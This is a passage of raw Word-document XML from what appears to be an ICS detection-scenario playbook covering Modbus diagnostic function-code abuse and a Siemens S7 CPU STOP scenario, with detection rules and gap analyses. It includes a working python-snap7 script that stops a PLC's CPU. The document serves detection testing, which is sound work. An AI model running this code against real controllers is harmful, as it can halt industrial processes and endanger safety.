      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T0858 — Change Operating Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UI verification path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Anomaly appears with title </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Rare function code observed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, indicator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>function_code:0x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>historical_count:0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Hover the corresponding edge in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Topology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — tooltip shows a 'rare command' amber badge above the protocol label.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the DPI modal for the edge → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Function code histogram</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> panel highlights 0x08 in amber against an otherwise blue (common: 0x03, 0x06, 0x10) histogram.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IMPACT NARRATIVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Most diagnostic-FC abuse is bracketed by other suspicious activity. Catching it in isolation gives the SOC an early warning before the real payload arrives:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Silent DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Force Listen Only causes the PLC to stop answering writes; operator sees stale tags but no obvious alarm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Pre-impact reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Get Comm Event Counter (sub-fn 0x0B) is often used to fingerprint device firmware versions before exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Long-tail catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the rule generalises to any vendor-specific FC the attacker tries (e.g. Schneider 0x5A, Modicon 0x5B), without per-vendor tuning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="92400E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GAP ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Rule treats *all* rare FCs equally; can be tightened:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>FC criticality scoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — sub-fn 0x04 (Force Listen Only) and 0x0A (Clear Counters) deserve HIGH, not MEDIUM. Capability needed: per-(protocol, fc) severity override map.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Excluding legitimate diagnostic windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — engineering workstation may legitimately issue FC 0x08 during quarterly maintenance. Capability needed: maintenance-window suppression list (Settings → Maintenance Mode).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 05  ·  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>S7 STOP CPU — production halt</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T0813 — Denial of Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (expected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protocol(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>S7Comm (TCP/102)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kill-chain phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Inhibit Response Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>THREAT OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Siemens S7 PLCs accept a PLC STOP request via S7Comm function 0x29 (PLC control), with parameter 'P_PROGRAM' to stop CPU execution. Once stopped, the PLC's outputs go to a configured safe state and the process under control halts — the textbook 'denial of control' attack. S7Comm v0/v1 has no authentication; v3 (S7-1200/1500) added integrated auth that many sites disable for legacy compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>REPRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Use `python-snap7` (a libsnap7 wrapper) to send the PLC STOP. The underlying PDU is FC 0x29 with sub-fn 'P_PROGRAM'.</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scenario05_s7_stop.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>import snap7</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PLC = '10.10.2.20'   # S7-1500</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>RACK, SLOT = 0, 1</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>client = snap7.client.Client()</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>client.connect(PLC, RACK, SLOT)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>print('CPU state before:', client.get_cpu_state())</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>client.plc_stop()</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>print('CPU state after :', client.get_cpu_state())</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>client.disconnect()</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture pcap with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tcpdump -i eth1 -w scenario05_s7_stop.pcap port 102</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">After the demo, restart with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>client.plc_hot_start()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Some S7-1200 firmware requires a full power cycle if the project is download-protected.</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dpi.unauthorized_write (S7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>UnauthorizedWriteRule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>S7Comm `isWrite = true` PDU crossing Purdue zones (or any S7 PLC control PDU once a future ICS-control rule lands)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T0813 — Denial of Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UI verification path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Topology edge L3 → L1 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.20.0.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.10.2.20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) flashes red with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>S7Comm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> label.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Anomaly title: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Unauthorized cross-zone write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Evidence panel shows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>protocol = S7COMM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>functionName = PLC STOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (populated by the S7 dissector).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-reference the Asset page for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.10.2.20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>lastSeenState</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> field flips to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>STOPPED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (if the asset polling job runs every 60s).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IMPACT NARRATIVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>S7 STOP is the most direct production-halt attack in the ICS lexicon — every minute of downtime is measurable in lost throughput:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Immediate production loss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — for a continuous process plant, a CPU stop translates to seconds-of-impact-per-second-of-detection-delay.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Cold-start risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — restarting some processes (cement kilns, glass furnaces, polymerisation reactors) can take hours or destroy the batch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Compounded by safety</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — if the safety logic runs on a separate F-CPU, the STOP may leave the process in a state the safety system cannot safely recover from.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="92400E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GAP ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Currently the rule treats S7 STOP as a generic cross-zone write. A dedicated rule would let the demo claim explicit detection of CPU control:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>dpi.s7_cpu_control rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — fire on any S7 FC 0x29 PDU regardless of zone, severity CRITICAL. Indicators include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>s7_subfunction:P_PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cpu_state_change:RUN→STOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Tracking CPU state across pcaps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — currently each upload is independent. Capability needed: Asset.s7CpuState materialised view, updated every ingest, surfaced on Asset detail page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 06  ·  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>S7 logic download (program / firmware push)</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T0843 — Program Download</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (expected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
